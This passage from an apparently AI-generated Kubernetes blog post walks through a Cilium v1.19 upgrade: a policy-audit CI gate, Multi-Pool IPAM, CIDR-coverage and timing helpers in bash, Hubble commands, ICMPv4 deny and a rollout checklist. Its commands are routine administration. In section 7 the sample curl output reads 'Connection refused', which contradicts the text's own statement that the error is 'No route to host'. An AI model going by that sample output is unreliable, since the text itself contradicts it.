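&lt;p&gt;Step 1 can be turned into a CI gate that blocks the upgrade PR until every flagged policy has an owner decision. The audit cannot tell local intent from mesh intent, so policies confirmed as local-only must be passed in as a reviewed list; otherwise they would be flagged forever. The sketch below is a hypothetical &lt;code&gt;upgrade_gate&lt;/code&gt; function. It reads the &lt;code&gt;namespace/name&lt;/code&gt; lines the audit prints and fails if any are unreviewed.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical pre-upgrade gate for the policy-default-local-cluster change.
# $1: space-separated "namespace/name" entries whose owners confirmed local-only intent
# stdin: "namespace/name" lines printed by the Step 1 audit
upgrade_gate() {
  local reviewed=" $1 " line count=0
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    case "$reviewed" in
      *" $line "*) continue ;;   # reviewed: local-only is the intended scope
    esac
    count=$((count + 1))
    echo "needs owner review: $line"
  done
  if [ "$count" -gt 0 ]; then
    echo "BLOCK: $count unreviewed policies without an explicit cluster label"
    return 1
  fi
  echo "OK: every unlabeled policy has been reviewed"
}

# Usage (step1_audit: hypothetical wrapper around the Step 1 jq command):
#   step1_audit | upgrade_gate "production/api-allow-frontend"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;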



&lt;h2&gt;
  
  
  5. Multi-Pool IPAM Stable — works with IPsec and direct routing
&lt;/h2&gt;

&lt;p&gt;Multi-Pool IPAM was introduced as Beta in v1.16, letting operators allocate different CIDRs to different workloads in the same cluster. Up to v1.18, however, it carried no stability guarantees in IPsec or direct-routing environments, which limited production use. v1.19 &lt;strong&gt;graduates it to Stable&lt;/strong&gt;, with official support for both environments.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 CiliumPodIPPool example
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Payments workload pool — non-overlapping CIDR with corporate VPC&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumPodIPPool&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments-pool&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;ipv4&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cidrs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;10.20.0.0/16&lt;/span&gt;
    &lt;span class="na"&gt;maskSize&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;24&lt;/span&gt;
  &lt;span class="na"&gt;ipv6&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cidrs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;fd00:payments::/56&lt;/span&gt;
    &lt;span class="na"&gt;maskSize&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;64&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Pod chooses pool via annotation&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-server&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;ipam.cilium.io/ip-pool&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments-pool&lt;/span&gt;   &lt;span class="c1"&gt;# v1.19 Stable&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
      &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api:1.0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
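
&lt;p&gt;A quick sanity check on pool size: &lt;code&gt;maskSize&lt;/code&gt; sets how large each per-node block carved out of the pool is, so the /16 pool above with &lt;code&gt;maskSize: 24&lt;/code&gt; yields 2^(24-16) = 256 blocks of 256 addresses. The helper below does that arithmetic. It is a back-of-the-envelope sketch that assumes every address in a block is usable and that nodes draw whole blocks on demand; &lt;code&gt;pool_capacity&lt;/code&gt; is a hypothetical name.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Back-of-the-envelope IPv4 capacity of a CiliumPodIPPool (a sketch, not Cilium code).
# Assumes every address in every block is usable; Cilium may hold some back.
#   $1  prefix length of the pool CIDR (16 for 10.20.0.0/16)
#   $2  maskSize: prefix length of each per-node block carved from the pool (24 above)
pool_capacity() {
  local prefix=$1 mask=$2
  if [ "$mask" -lt "$prefix" ] || [ "$mask" -gt 32 ]; then
    echo "invalid: maskSize must be between $prefix and 32"
    return 1
  fi
  local blocks=$(( 2 ** (mask - prefix) ))    # per-node blocks the pool can hand out
  local per_block=$(( 2 ** (32 - mask) ))     # addresses in each block
  echo "blocks=$blocks ips_per_block=$per_block total=$(( blocks * per_block ))"
}

pool_capacity 16 24   # payments-pool, prints: blocks=256 ips_per_block=256 total=65536
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The block count is the number that runs out first: once all 256 blocks are assigned, a node that needs another block cannot get one from this pool, however few pods each existing block holds.&lt;/p&gt;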



&lt;h3&gt;
  
  
  5.2 IPsec strict mode + Multi-Pool combo — set strict CIDR wide enough
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# When combining the two, the strict CIDR must cover every pool&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ipsec&lt;/span&gt;
  &lt;span class="na"&gt;strictMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;cidr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.0/8"&lt;/span&gt;    &lt;span class="c1"&gt;# WARNING: must encompass all CiliumPodIPPool CIDRs&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
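
&lt;p&gt;The coverage rule in the comment above can be checked mechanically before strict mode is switched on. The sketch below uses plain bash integer arithmetic (IPv4 only) to test whether each pool CIDR lies inside the strict-mode CIDR. The helper names are hypothetical, and the commented usage line assumes you read pool CIDRs from the &lt;code&gt;CiliumPodIPPool&lt;/code&gt; objects with a kubectl jsonpath query.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch (not Cilium code): check that IPv4 pool CIDRs sit inside the strict-mode CIDR.
# Pure bash integer arithmetic; IPv6 pools are out of scope.

# ip_to_int A.B.C.D: print the address as a 32-bit integer (10.20.0.0 gives 169082880)
ip_to_int() {
  local IFS=.
  set -- $1                      # word-split "A.B.C.D" on "." into $1..$4
  echo $(( $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 ))
}

# cidr_contains OUTER INNER: succeed if INNER equals OUTER or is a subnet of it
cidr_contains() {
  local outer_net=${1%/*} outer_len=${1#*/}
  local inner_net=${2%/*} inner_len=${2#*/}
  # An inner prefix shorter than the outer one is wider, so it cannot fit.
  [ "$inner_len" -ge "$outer_len" ] || return 1
  # Dividing by 2^(32 - outer_len) drops the outer prefix's host bits;
  # both addresses must then have the same network part.
  local div=$(( 2 ** (32 - outer_len) ))
  [ $(( $(ip_to_int "$outer_net") / div )) -eq $(( $(ip_to_int "$inner_net") / div )) ]
}

# check_pools STRICT_CIDR POOL_CIDR...: report each pool, fail if any is uncovered
check_pools() {
  local strict=$1 cidr rc=0
  shift
  for cidr in "$@"; do
    if cidr_contains "$strict" "$cidr"; then
      echo "covered:   $cidr"
    else
      echo "UNCOVERED: $cidr"
      rc=1
    fi
  done
  return "$rc"
}

# Usage with live pools (assumes kubectl access to the cluster):
#   check_pools 10.0.0.0/8 $(kubectl get ciliumpodippools -o jsonpath='{.items[*].spec.ipv4.cidrs[*]}')
check_pools 10.0.0.0/8 10.20.0.0/16   # payments-pool from 5.1, prints "covered:   10.20.0.0/16"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Integer division stands in for a bitwise mask here: two addresses share a /N network exactly when they give the same quotient after dividing by 2^(32-N).&lt;/p&gt;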



&lt;h2&gt;
  
  
  6. Hubble drop event policy tagging, encrypted-flow filters, Trace IP Options
&lt;/h2&gt;

&lt;p&gt;The three observability additions in v1.19 cut debugging time directly.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Drop events automatically carry the denying policy name
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# v1.18: drop reason only — "which policy denied?" needs manual correlation&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--verdict&lt;/span&gt; DROPPED &lt;span class="nt"&gt;--since&lt;/span&gt; 5m
&lt;span class="c"&gt;# Aug 12 12:34:56 default/api-1234 :: default/db-5678 DROPPED (Policy denied)&lt;/span&gt;

&lt;span class="c"&gt;# v1.19: policy name and namespace attached to the verdict label&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--verdict&lt;/span&gt; DROPPED &lt;span class="nt"&gt;--since&lt;/span&gt; 5m &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="s1"&gt;'.flow.dropReasonDesc'&lt;/span&gt;
&lt;span class="c"&gt;# {&lt;/span&gt;
&lt;span class="c"&gt;#   "reason": "PolicyDenied",&lt;/span&gt;
&lt;span class="c"&gt;#   "policy_name": "default-deny-egress",&lt;/span&gt;
&lt;span class="c"&gt;#   "policy_namespace": "production",&lt;/span&gt;
&lt;span class="c"&gt;#   "policy_kind": "CiliumNetworkPolicy"&lt;/span&gt;
&lt;span class="c"&gt;# }&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6.2 Encrypted vs unencrypted flow filtering
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Show only unencrypted traffic — essential before enabling strict mode&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--unencrypted&lt;/span&gt; &lt;span class="nt"&gt;--since&lt;/span&gt; 1h | &lt;span class="nb"&gt;tee &lt;/span&gt;unencrypted.log

&lt;span class="c"&gt;# Show only encrypted traffic for analysis&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--encrypted&lt;/span&gt; &lt;span class="nt"&gt;--since&lt;/span&gt; 1h &lt;span class="nt"&gt;--output&lt;/span&gt; json &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; encrypted.jsonl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6.3 Trace IP Options — mark specific packets for path tracing
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Mark packets with IPv4 options to trace their datapath hops&lt;/span&gt;
&lt;span class="c"&gt;# WARNING: some NICs/switches drop packets with IPv4 options — validate in test env&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system patch cm cilium-config &lt;span class="nt"&gt;--type&lt;/span&gt; merge &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;'{"data":{"trace-ip-options":"true"}}'&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system rollout restart ds/cilium

&lt;span class="c"&gt;# Show per-hop trace for marked packets&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--ip-option-marked&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Network Policy ICMPv4 Destination Unreachable — ending the dumb 30-second retry
&lt;/h2&gt;

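&lt;p&gt;In v1.18 and earlier, a Network Policy denial silently dropped the packet, so the client kept retransmitting its TCP SYN until its connect timeout expired: often tens of seconds, and about two minutes with Linux's default &lt;code&gt;tcp_syn_retries&lt;/code&gt;. v1.19 adds an option to return &lt;strong&gt;ICMPv4 Destination Unreachable (code 13, Communication Administratively Prohibited)&lt;/strong&gt; instead. The client kernel treats this as a hard error and fails the connect immediately (Linux surfaces code 13 as &lt;code&gt;EHOSTUNREACH&lt;/code&gt;, "No route to host", rather than "connection refused"), so a denial shows up in roughly one round trip instead of after a timeout.&lt;/p&gt;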

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml&lt;/span&gt;
&lt;span class="c1"&gt;# WARNING: external firewalls blocking ICMPv4 will swallow the response&lt;/span&gt;
&lt;span class="na"&gt;policyEnforcementMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;policyAuditMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;span class="na"&gt;icmpUnreachable&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;       &lt;span class="c1"&gt;# v1.19 new — friendly deny response&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify the friendly deny&lt;/span&gt;
kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; test-pod &lt;span class="nt"&gt;--&lt;/span&gt; curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://api:8080
&lt;span class="c"&gt;# * connect to api port 8080 failed: Connection refused   ← terminates immediately, no 30s wait&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
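
&lt;p&gt;To put a number on the difference (checklist item 14 tracks the time it takes a denied connection to fail), time the denied request instead of eyeballing it. A minimal sketch, assuming GNU &lt;code&gt;date&lt;/code&gt; (for nanosecond &lt;code&gt;%N&lt;/code&gt;); the helper names are hypothetical, and the usage line reuses &lt;code&gt;test-pod&lt;/code&gt; and &lt;code&gt;http://api:8080&lt;/code&gt; from the example above.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: measure how long a command (e.g. a denied connection attempt) takes to finish.
# Assumes GNU date for %N (nanoseconds).

# elapsed_ms CMD...: run CMD, discard its stdout, print wall-clock milliseconds
elapsed_ms() {
  local start end
  start=$(date +%s%N)
  "$@" | tail -n 0 || true       # a failing CMD is expected here; only the timing matters
  end=$(date +%s%N)
  echo $(( (end - start) / 1000000 ))
}

# finishes_within MAX_MS CMD...: succeed if CMD finished within MAX_MS milliseconds
finishes_within() {
  local max_ms=$1 took
  shift
  took=$(elapsed_ms "$@")
  echo "took ${took}ms (limit ${max_ms}ms)"
  [ "$took" -le "$max_ms" ]
}

# Usage against the denied service; --max-time caps the old silent-drop case at 35 s:
#   finishes_within 2000 kubectl exec test-pod -- curl -s --max-time 35 http://api:8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Run the same check before and after enabling the option: with silent drops it should hit the &lt;code&gt;--max-time&lt;/code&gt; cap, and with the ICMP response it should return well under the limit, including the &lt;code&gt;kubectl exec&lt;/code&gt; overhead.&lt;/p&gt;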



&lt;h2&gt;
  
  
  8. Visualization — how v1.19's six axes combine in the deployment flow
&lt;/h2&gt;

&lt;p&gt;The diagram below shows how the six axes of v1.19 combine when a new workload is deployed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart LR
    A[New Pod deploy] --&amp;gt; B{Which IP Pool?}
    B --&amp;gt;|payments-pool| C[Multi-Pool IPAM Stable&amp;lt;br/&amp;gt;allocate from 10.20.0.0/16]
    C --&amp;gt; D{Inside strict mode CIDR?}
    D --&amp;gt;|Yes| E[IPsec/WireGuard&amp;lt;br/&amp;gt;strict encryption enforced]
    D --&amp;gt;|No| F[Outside strict CIDR&amp;lt;br/&amp;gt;encryption best-effort, plaintext still allowed]
    F --&amp;gt; G
    E --&amp;gt; G{Namespace enrolled in Ztunnel?}
    G --&amp;gt;|Yes| H[Ztunnel mTLS Beta&amp;lt;br/&amp;gt;SPIFFE SVID issued]
    G --&amp;gt;|No| I[L4 only]
    H --&amp;gt; J[Evaluate CiliumNetworkPolicy]
    I --&amp;gt; J
    J --&amp;gt;|allow| K[Hubble flow OK]
    J --&amp;gt;|deny| L[ICMPv4 friendly deny&amp;lt;br/&amp;gt;Hubble drop + policy name tagged]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  9. ManoIT internal checklist — 3 clusters × 16 steps
&lt;/h2&gt;

&lt;p&gt;The checklist below extends the seven sections above into an operations procedure. ManoIT runs three clusters (prod / stage / dev) and validates alpha/beta features in staging for 2 weeks and prod for 1 week before progressive rollout.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Completion criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory Cilium · Hubble · ClusterMesh API server versions across 3 clusters&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;PR listing instances below v1.19&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Audit CiliumNetworkPolicy — extract rules with no cluster label&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;jq script output + contact each policy owner&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Add explicit cluster labels to policies whose intent was mesh-wide&lt;/td&gt;
&lt;td&gt;Each service owner&lt;/td&gt;
&lt;td&gt;All policy PRs merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Upgrade dev to v1.19.4 (strict OFF, Ztunnel OFF)&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cilium version&lt;/code&gt; = 1.19.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Validate mesh-policy regression in dev — zero unintended communication breaks&lt;/td&gt;
&lt;td&gt;Each service owner&lt;/td&gt;
&lt;td&gt;Hubble drop counter delta report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Upgrade staging to v1.19.4 (strict OFF, Ztunnel OFF), then enable Multi-Pool IPAM&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;Verify allocation from payments-pool for new pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Enable IPsec strict mode in staging using the 4-step rollout&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;14-day report with unencrypted drops = 0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Enable Ztunnel Beta in staging — only one namespace enrolled&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;SPIRE integration OK, mTLS flow visible in Hubble&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Verify Hubble drop tagging, encrypted filter, Trace IP Options&lt;/td&gt;
&lt;td&gt;Observability team&lt;/td&gt;
&lt;td&gt;Operations runbook updated for the 3 features&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Enable ICMPv4 friendly deny — check external firewall ICMP rules&lt;/td&gt;
&lt;td&gt;Network + Platform team&lt;/td&gt;
&lt;td&gt;Immediate termination verified (curl/ping tests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Upgrade prod to v1.19.4 (strict OFF, Ztunnel OFF)&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;prod &lt;code&gt;cilium version&lt;/code&gt; = 1.19.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Enable Multi-Pool IPAM in prod — payments and logs workloads first&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;Per-pool IP usage exported as Prometheus metric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Gradually enable IPsec strict mode in prod — 4-step standard procedure&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;30-day unencrypted drops = 0 + compliance audit evidence&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Enable ICMPv4 friendly deny in prod, mirroring the staging validation in step 10&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;Average denial termination time 30s → 1s measurement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Add Prometheus alerts — &lt;code&gt;cilium_encryption_unencrypted_packets_dropped_total&lt;/code&gt; increase, ClusterMesh policy drop spikes, Multi-Pool exhaustion&lt;/td&gt;
&lt;td&gt;Observability team&lt;/td&gt;
&lt;td&gt;Alert rule PR merged, fire/resolve test passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Operational RFC — Ztunnel Beta enrollment for new workloads only, existing workloads after Beta exits&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;RFC merged, scheduled for quarterly security review&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
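
&lt;p&gt;Item 1's inventory boils down to a version comparison. The sketch below flags clusters running a Cilium version older than a target, using GNU &lt;code&gt;sort -V&lt;/code&gt;. The input format (one &lt;code&gt;cluster version&lt;/code&gt; pair per line) and the helper names are assumptions, and collecting the versions from each cluster is left out.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch for checklist item 1: list clusters whose Cilium version is below a target.
# Input on stdin: "cluster version" pairs (how you collect them is up to you).
# Relies on GNU sort -V, which orders numeric release versions but does not
# follow SemVer rules for pre-release suffixes such as "-rc.1".

# version_lt A B: succeed if version A sorts strictly before version B
version_lt() {
  [ "$1" != "$2" ] || return 1
  [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# below_target TARGET: echo every "cluster version" line older than TARGET
below_target() {
  local target=$1 cluster version
  while read -r cluster version; do
    [ -n "$cluster" ] || continue
    if version_lt "$version" "$target"; then
      echo "$cluster $version"
    fi
  done
}

printf '%s\n' "prod 1.18.6" "stage 1.19.4" "dev 1.18.10" | below_target 1.19.0
# prints "prod 1.18.6" and "dev 1.18.10", one per line
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;code&gt;sort -V&lt;/code&gt; is used instead of a plain string comparison because lexical order would put 1.18.10 before 1.18.6.&lt;/p&gt;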

&lt;h2&gt;
  
  
  10. Conclusion — the 10-year inflection point that flipped defaults toward safety
&lt;/h2&gt;

&lt;p&gt;Wrap the six changes of v1.19 in one line: &lt;strong&gt;"Cilium spent ten years getting to the point where it can ship operational safety nets as defaults."&lt;/strong&gt; Strict mode for IPsec and WireGuard structurally erases the plaintext window of best-effort encryption. Ztunnel integration brings sidecarless workload authentication to beta and aligns with the Istio Ambient camp. ClusterMesh policy-default-local-cluster inverts the most dangerous default of the past six years. Multi-Pool IPAM Stable hands back CIDR autonomy in a safe form. Hubble drop tagging, encrypted-flow filters, and Trace IP Options answer "why was this dropped?" in one command. ICMPv4 friendly deny collapses 30-second retry loops to 1 second.&lt;/p&gt;

&lt;p&gt;Three reminders for operators as we close. (1) &lt;strong&gt;Audit ClusterMesh policies before upgrading&lt;/strong&gt;: the policy-default-local-cluster default flip is the v1.19 change most likely to cause an incident, and it can cut traffic without warning. (2) &lt;strong&gt;Roll out strict mode in four steps&lt;/strong&gt;: key distribution → enable strict mode with allow remote = true and soak for 1 week → switch to allow remote = false → 30 days of stability monitoring. (3) &lt;strong&gt;Adopt Ztunnel Beta starting from new namespaces&lt;/strong&gt;: SPIRE / SPIFFE SVID integration is operationally heavy, so enroll payments and high-sensitivity workloads first and revisit the rest after v1.20 GA. The 16-item checklist in §9 turns exactly this into an internal procedure. The shortest one-line recommendation: &lt;em&gt;"Upgrade dev to v1.19.4 today, and open the ClusterMesh policy audit PR this week."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Found this useful?&lt;/strong&gt; Hit the ❤️ reaction to help others find it too!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's your experience with Cilium strict mode or Ztunnel?&lt;/strong&gt; Share in the comments — I'd love to hear about your production rollout and the lessons you learned.&lt;/p&gt;




&lt;p&gt;ⓘ This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) by analyzing the Cilium v1.19.0 release notes (GitHub Discussions #44191) published on May 13, 2026, the subsequent v1.19.4 patch (2026-05-27), the Encryption / IPAM / Hubble / ClusterMesh docs at docs.cilium.io, Isovalent's v1.19 release blog, and InfoQ's 10-year retrospective as primary sources. The alpha/beta gate flag names, behaviors, and metrics in this article reflect the official documentation as of the publication date (2026-05-28); Beta features may change in subsequent releases. Verify against cilium/cilium GitHub Releases and docs.cilium.io before applying to production. The internal-adoption examples cite an adapted ManoIT platform-team RFC.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1479495" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>security</category>
      <category>observability</category>
      <category>servicemesh</category>
    </item>
    <item>
